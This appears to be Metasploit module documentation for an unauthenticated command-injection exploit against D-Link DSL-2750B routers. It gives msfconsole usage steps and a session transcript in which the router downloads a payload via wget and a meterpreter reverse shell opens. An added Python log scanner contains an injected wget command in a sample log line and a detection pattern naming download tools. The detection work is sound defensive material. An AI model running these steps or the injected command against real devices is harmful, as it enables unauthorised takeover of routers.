metasploit-gs/documentation/modules/exploit/linux/http/dlink_dsl2750b_exec_noauth.md
2018-05-13 15:04:40 -04:00


This module, dlink_dsl2750b_exec_noauth, exploits an unauthenticated command injection vulnerability reachable through the "cli" parameter. Firmware versions 1.01 through 1.03 are vulnerable.
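As an added defender-side example (not part of the module's documentation or the Metasploit project), the following Python script triages router HTTP access logs for requests that carry the "cli" parameter with shell metacharacters or a download tool in its value, and checks a reported firmware version against the affected range given above. The log lines and the endpoint path /placeholder.cgi are constructed for the example; the page does not name the real endpoint.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Firmware versions the module description lists as vulnerable (1.01 through 1.03).
VULNERABLE_FIRMWARE = {"1.01", "1.02", "1.03"}

# Shell metacharacters and staging tools that have no legitimate place in a "cli" value.
SUSPICIOUS = re.compile(r"[;|`&]|\$\(|\bwget\b|\bcurl\b|\btftp\b|/tmp/", re.IGNORECASE)

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


def firmware_is_vulnerable(version: str) -> bool:
    """Return True when a reported DSL-2750B firmware version is in the affected range."""
    return version.strip() in VULNERABLE_FIRMWARE


def inspect_request(target: str) -> list:
    """Return reasons the request target looks like a 'cli' injection attempt, or [] if clean."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # parse_qs already URL-decodes once
    reasons = []
    for value in params.get("cli", []):
        decoded = unquote(value)  # second decode catches double-encoded values
        hit = SUSPICIOUS.search(decoded)
        if hit:
            reasons.append(f"cli value contains {hit.group(0)!r}: {decoded!r}")
    return reasons


def scan_log(lines) -> list:
    """Return (client_ip, timestamp, reasons) for each suspicious request in access-log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in Common Log Format; skip rather than guess
        reasons = inspect_request(m["target"])
        if reasons:
            findings.append((m["ip"], m["ts"], reasons))
    return findings


# Constructed sample log lines (not taken from the page); /placeholder.cgi is a placeholder path.
SAMPLE_LOG = [
    '192.168.1.6 - - [13/May/2018:14:58:01 -0400] "GET /placeholder.cgi?cli=show HTTP/1.1" 200 512',
    '192.168.1.6 - - [13/May/2018:14:58:05 -0400] "GET /placeholder.cgi?cli=%3Bwget%20http%3A%2F%2F192.168.1.6%3A8080%2FV9GiueD0WW%20-O%20%2Ftmp%2Fp HTTP/1.1" 200 0',
    '192.168.1.7 - - [13/May/2018:14:59:00 -0400] "GET /index.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, ts, reasons in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip}: {'; '.join(reasons)}")
    print("firmware 1.02 affected:", firmware_is_vulnerable("1.02"))
```

The second decode in inspect_request is deliberate: a value that is percent-encoded twice survives parse_qs still encoded, and the metacharacter check would otherwise miss it. A second signal worth correlating, visible in the session output below, is the router itself making an outbound wget request to a non-standard port on a LAN host shortly after such a request.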

Vulnerable Application

  1. Start msfconsole
  2. Do: use exploit/linux/http/dlink_dsl2750b_exec_noauth
  3. Do: set RHOST [RouterIP]
  4. Do: set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
  5. Do: run
  6. If the router is vulnerable, the payload should be dropped via the wget method and executed, giving us a meterpreter session

Example

msf5 > use exploit/linux/http/dlink_dsl2750b_exec_noauth 
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp 
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LHOST eth0
LHOST => eth0
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > set LPORT 5555
LPORT => 5555
msf5 exploit(linux/http/dlink_dsl2750b_exec_noauth) > run

[*] Started reverse TCP handler on 192.168.1.6:5555 
[*] 192.168.1.1:80 Checking target version...
[*] Using URL: http://0.0.0.0:8080/V9GiueD0WW
[*] Local IP: http://192.168.1.6:8080/V9GiueD0WW
[*] Client 192.168.1.1 (Wget) requested /V9GiueD0WW
[*] Sending payload to 192.168.1.1 (Wget)
[*] Sending stage (1104216 bytes) to 192.168.1.1
[*] Meterpreter session 18 opened (192.168.1.6:5555 -> 192.168.1.1:37259) at 2018-05-13 14:58:08 -0400
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.

meterpreter > ls -la
Listing: /
==========

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40755/rwxr-xr-x   2554    dir   2013-03-11 07:27:09 -0400  bin
40755/rwxr-xr-x   3       dir   2013-03-11 07:27:54 -0400  data
40755/rwxr-xr-x   2482    dir   2013-03-11 07:27:56 -0400  dev
40755/rwxr-xr-x   779     dir   2013-03-11 07:27:55 -0400  etc
40755/rwxr-xr-x   690     dir   2013-03-11 07:27:55 -0400  lib
100755/rwxr-xr-x  287124  fil   2013-03-11 07:27:55 -0400  linuxrc
40755/rwxr-xr-x   0       dir   1969-12-31 19:00:01 -0500  mnt
40755/rwxr-xr-x   56      dir   2013-03-11 07:13:15 -0400  opt
40555/r-xr-xr-x   0       dir   1969-12-31 19:00:00 -0500  proc
40755/rwxr-xr-x   270     dir   2013-03-11 07:25:43 -0400  sbin
40755/rwxr-xr-x   0       dir   1969-12-31 19:00:00 -0500  sys
40755/rwxr-xr-x   0       dir   2016-10-07 17:20:39 -0400  tmp
40755/rwxr-xr-x   38      dir   2013-03-11 07:23:32 -0400  usr
40755/rwxr-xr-x   0       dir   2016-10-07 17:16:34 -0400  var
40755/rwxr-xr-x   2801    dir   2013-03-11 07:26:34 -0400  webs